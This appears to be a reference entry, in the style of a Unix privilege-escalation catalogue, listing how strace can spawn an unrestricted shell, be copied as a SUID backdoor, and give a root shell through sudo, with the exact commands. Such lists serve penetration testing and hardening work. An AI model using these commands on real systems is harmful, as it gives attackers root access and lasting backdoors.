It can be used to break out from restricted environments by spawning an interactive system shell.
strace -o /dev/null /bin/sh
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run
sh -p, omit the
-p argument on systems
like Debian that allow the default
sh shell to run with SUID privileges.
cp $(which strace) . sudo sh -c 'chown 0 ./strace; chmod +s ./strace' ./strace -o /dev/null /bin/sh -p
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on
sudo strace -o /dev/null /bin/sh